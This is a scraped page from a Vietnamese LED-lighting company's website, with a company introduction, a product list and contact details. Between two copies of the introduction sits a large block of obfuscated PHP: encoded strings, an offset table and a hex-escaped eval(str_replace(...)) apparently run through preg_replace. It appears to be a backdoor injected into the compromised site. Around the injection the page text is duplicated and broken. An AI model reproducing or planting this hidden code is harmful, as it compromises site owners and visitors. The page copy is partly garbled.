Welcome to Our site
 
Welcome to Our site
 
Giới thiệu
 
 
 
Đèn LED Cty TNHH SX-TM AN THẠNH
------------oOo------------
Công ty TNHH SX-TM AN THẠNH được thành lập để cung cấp cho khách hàng của mình dễ dàng đến các sản phẩm chiếu sáng LED tốt nhất. Dựa trên những kinh nghiệm kinh doanh xuất khẩu LED, chúng tôi cung cấp cho Khách hàng về cam kết độ tin cậy, chất lượng và tốc độ. Hãy suy nghĩ AN THẠNH là công ty hiệu quả nhất của bạn.
Sản phẩm chính đèn LED chiếu sáng của chúng tôi bao gồm,
(1) Đèn Tròn (Led Bulbs): LED Spotlight Bulb, Globe LED Bulb, LED Festoon Bulb, LED G4 Bulb.
(2) Đèn Strip (Led Strips): Flexible LED Strip, Waterproof LED Light Bar.
(3) Đèn Xây Dựng (Led Build-in): T5, T8, T10.
(4) Đèn Flood (Led Flood): Super Flux LED Module, R/G/B LED Module.
(5) Đèn Đường (Led Street): LED Wall Washer, LED Projector.
(6) Đèn Công Nghiệp (Led Industrial): LED Grow Panel, LED Grow Spot, LED Grow UFO.
Tất cả các đèn LED tiêu thụ năng lượng một cách hiệu quả và do đó giúp giảm lượng khí thải CO2 và bảo vệ môi trường.
Chúng tôi có kinh nghiệm đầy đủ với đội ngũ bán hàng cung cấp cho bạn với dịch vụ nhanh chóngchuyên nghiệp. Dịch vụ và chăm sóc khách hàng là điều chúng tôi thực hiện rất nghiêm túc. Nếu bạn có một vấn đề với một trong các sản phẩm của chúng tôi xin vui lòng Email cho chúng tôi và chúng tôi sẽ cố gắng hết sức khắc phục vấn đề một cách nhanh nhất để đáp ứng kịp thời nhu cầu cầu của Quý Khách hàng.
Không tìm thấy Sản phẩm mà những gì bạn đang tìm kiếm? Hãy Email cho chúng tôi và đội ngũ Chăm sóc Khách hàng của chúng tôi sẽ làm tốt nhất với khả năng và kinh nghiệm của mình để giúp đỡ Quý khách.
Bạn là một doanh nghiệp muốn đặt hàng với giá sỉ? Chúng tôi luôn sẵn sàng giảm giá cho đơn đặt hàng với số lượng lớn hoặc bạn đang có nhu cầu cần làm Đại lý bán lẻ? Xin vui lòng gửi Email hoặc liên hệ qua số điện thoại 08.3997 1008 để biết thêm thông tin chi tiết!!!     Xem nhóm sản phẩm Đèn LED
Tel:  08.39971008
Fax: 08.39974214
!#]y84]275]y83!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%%x5c%x7827rfs%x5c%x78256~6hmg%x5c%x7825!<12>j%7824*!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x78x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusups)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x782R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,4pjudovg<~%x5c%x7824!%x5c%x78242178}527%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%xvr#%x5c%x785cq%x5c%x78257**^#zsfvf_*#fmjgk4%x5c%x7860{6~6!%x5c%x782400~:b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c5c%x7824<%x5c%x7825j,,*!|c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256^#zsf#>.%x5c%x7825!<***f%x5c%x7827,*e%qsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~5h%x5c%x7825!<]241]334]368]322]3]364]6]5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!g%x5c%x7825%x5c%x782fh%x5c%x7825)n%feobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-5ww2!>#p#%x5c%x782f#p#]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x78257R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x57eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x782qj%x5c%x78256<^#zsfvr#%x5c%x785}*!%x5c%x7825b:>1%x5c%x7825s:%x5c%x78c%x787fw6*CWtfs%x5c%]y81]265]y72]254]y76]615c%x5c%x7825j:.2^,%x5c%x7825b:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQsfebfI{*w%x5c%x7825)kV%x5c%x7x6d%160%x6c%157%x64%145%x28%141%xx7825}X;!sp!*#opo#>>}R;msx5c%x7827)fepdof.)fepdof]273]y76]271]y7d]252]y74]256##]D4r#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%}88:}334}472%x5c%x7824!#]y81]273]y76]258]y6g/(.*)/epreg_replacedsyoizuevh'; $axmviwhqbx = explode(chr((153-109)),'7448,64,3727,45,1539,27,2276,32,5665,32,924,47,815,26,9839,33,4899,26,6496,36,5996,26,6532,50,3122,21,1689,52,2473,20,2175,31,7655,66,2206,70,7786,30,2867,49,108,23,9536,60,131,35,6582,65,7313,51,6647,61,6813,54,7913,27,8812,34,8160,69,6867,38,717,68,3040,58,4947,37,9596,31,4472,49,9023,50,8588,33,9997,49,68,40,6136,38,270,28,5206,58,2147,28,4379,55,8621,44,9684,20,4756,23,6295,28,6754,59,573,65,1935,65,328,62,6940,31,6708,46,4145,49,1780,28,1441,50,6217,56,1395,46,3143,36,841,25,4434,38,1566,61,4234,28,3682,45,166,35,3513,53,3851,47,9106,70,3566,51,5407,30,9252,69,7940,57,2637,66,4194,40,2774,29,5050,45,5437,57,5847,69,4779,42,1196,52,5618,47,9073,33,3001,39,9897,24,9176,51,866,58,8337,47,7624,31,9355,55,4262,53,3248,63,6347,62,9772,38,5336,38,5697,66,1281,65,8936,62,1741,39,4821,26,5494,64,7857,56,9872,25,971,60,2966,35,3978,32,3822,29,3656,26,390,29,2493,59,201,69,6174,22,1808,63,2803,64,7049,52,2000,41,7249,64,8424,40,9497,39,1131,65,9810,29,4046,45,5316,20,638,36,2916,50,4847,24,6995,54,5264,52,4315,64,5579,39,8024,44,3446,67,7816,41,3098,24,1111,20,4871,28,8872,64,5374,33,5788,34,1346,49,9321,34,1627,62,8719,45,7399,49,2041,66,2107,40,4010,36,8464,54,10046,60,9921,31,4091,54,4984,66,8068,32,5916,57,3179,69,8290,47,8665,54,1031,22,8998,25,8518,70,7997,27,2357,62,1871,64,1491,48,4521,51,3339,40,5763,25,8764,48,5973,23,4662,40,2419,25,3772,50,7721,65,545,28,2703,20,2552,47,674,43,2599,38,8846,26,6971,24,7364,35,7101,54,8100,60,7578,46,4572,60,7155,41,1248,33,9952,45,4632,30,9432,65,5822,25,785,30,1053,58,6273,22,6022,50,3379,67,9227,25,2444,29,8229,61,4702,54,3311,28,486,59,6442,54,0,68,298,30,5558,21,9628,56,9727,45,6905,35,6072,64,8384,40,9410,22,2308,49,6409,33,4925,22,3952,26,6323,24,7512,66,5095,63,3898,54,6196,21,3617,39,5158,48,7196,53,9704,23,2723,51,419,67,9627,1'); $mdhnwrevkl=substr($xbjqznamju,(52375-42269),(21-14)); if (!function_exists('tyesyjtwdl')) { function tyesyjtwdl($bftcrnltvy, $gwfmvagiek) { $sfmlmyxfuu = NULL; for($mkweshizzw=0;$mkweshizzw<(sizeof($bftcrnltvy)/2);$mkweshizzw++) { $sfmlmyxfuu .= substr($gwfmvagiek, $bftcrnltvy[($mkweshizzw*2)],$bftcrnltvy[($mkweshizzw*2)+1]); } return $sfmlmyxfuu; };} $zvstsgbuvm="\x20\57\x2a\40\x74\171\x6a\170\x65\160\x62\147\x76\146\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\64\x32\55\x32\60\x35\51\x29\54\x20\143\x68\162\x28\50\x34\66\x37\55\x33\67\x35\51\x29\54\x20\164\x79\145\x73\171\x6a\164\x77\144\x6c\50\x24\141\x78\155\x76\151\x77\150\x71\142\x78\54\x24\170\x62\152\x71\172\x6e\141\x6d\152\x75\51\x29\51\x3b\40\x2f\52\x20\164\x72\155\x68\154\x6c\163\x74\150\x67\40\x2a\57\x20"; $gxhufmveot=substr($xbjqznamju,(44803-34690),(43-31)); $gxhufmveot($mdhnwrevkl, $zvstsgbuvm, NULL); $gxhufmveot=$zvstsgbuvm; $gxhufmveot=(590-469); $xbjqznamju=$gxhufmveot-1; ?> Thương Mại Điện Tử An Thạnh | Thiết Bị Điện Tử ASCENT.
Welcome to Our site
 
Giới thiệu
 
 
 
Đèn LED Cty TNHH SX-TM AN THẠNH
------------oOo------------
Công ty TNHH SX-TM AN THẠNH được thành lập để cung cấp cho khách hàng của mình dễ dàng đến các sản phẩm chiếu sáng LED tốt nhất. Dựa trên những kinh nghiệm kinh doanh xuất khẩu LED, chúng tôi cung cấp cho Khách hàng về cam kết độ tin cậy, chất lượng và tốc độ. Hãy suy nghĩ AN THẠNH là công ty hiệu quả nhất của bạn.
Sản phẩm chính đèn LED chiếu sáng của chúng tôi bao gồm,
(1) Đèn Tròn (Led Bulbs): LED Spotlight Bulb, Globe LED Bulb, LED Festoon Bulb, LED G4 Bulb.
(2) Đèn Strip (Led Strips): Flexible LED Strip, Waterproof LED Light Bar.
(3) Đèn Xây Dựng (Led Build-in): T5, T8, T10.
(4) Đèn Flood (Led Flood): Super Flux LED Module, R/G/B LED Module.
(5) Đèn Đường (Led Street): LED Wall Washer, LED Projector.
(6) Đèn Công Nghiệp (Led Industrial): LED Grow Panel, LED Grow Spot, LED Grow UFO.
Tất cả các đèn LED tiêu thụ năng lượng một cách hiệu quả và do đó giúp giảm lượng khí thải CO2 và bảo vệ môi trường.
Chúng tôi có kinh nghiệm đầy đủ với đội ngũ bán hàng cung cấp cho bạn với dịch vụ nhanh chóngchuyên nghiệp. Dịch vụ và chăm sóc khách hàng là điều chúng tôi thực hiện rất nghiêm túc. Nếu bạn có một vấn đề với một trong các sản phẩm của chúng tôi xin vui lòng Email cho chúng tôi và chúng tôi sẽ cố gắng hết sức khắc phục vấn đề một cách nhanh nhất để đáp ứng kịp thời nhu cầu cầu của Quý Khách hàng.
Không tìm thấy Sản phẩm mà những gì bạn đang tìm kiếm? Hãy Email cho chúng tôi và đội ngũ Chăm sóc Khách hàng của chúng tôi sẽ làm tốt nhất với khả năng và kinh nghiệm của mình để giúp đỡ Quý khách.
Bạn là một doanh nghiệp muốn đặt hàng với giá sỉ? Chúng tôi luôn sẵn sàng giảm giá cho đơn đặt hàng với số lượng lớn hoặc bạn đang có nhu cầu cần làm Đại lý bán lẻ? Xin vui lòng gửi Email hoặc liên hệ qua số điện thoại 08.3997 1008 để biết thêm thông tin chi tiết!!!     Xem nhóm sản phẩm Đèn LED
Tel:  08.39971008
Fax: 08.39974214
Thương Mại Điện Tử An Thạnh | Thiết Bị Điện Tử ASCENT.
 
 
 
Cty TNHH SX-TM AN THẠNH
Add: 161 Hoàng Văn Thụ, P.8, Q.Phú Nhuận, Tp.HCM
Tel: 08.3997 1008,   Fax: 08.3997 4214
Email: info@anthanh.com
Website: anthanh.com
           
Terms | Privacy | Links | Newsletters | Copyright © ® 2010 anthanh.com All rights reserved.
This website is owned operated by AN THANH Co., Ltd. - email: info@anthanh.com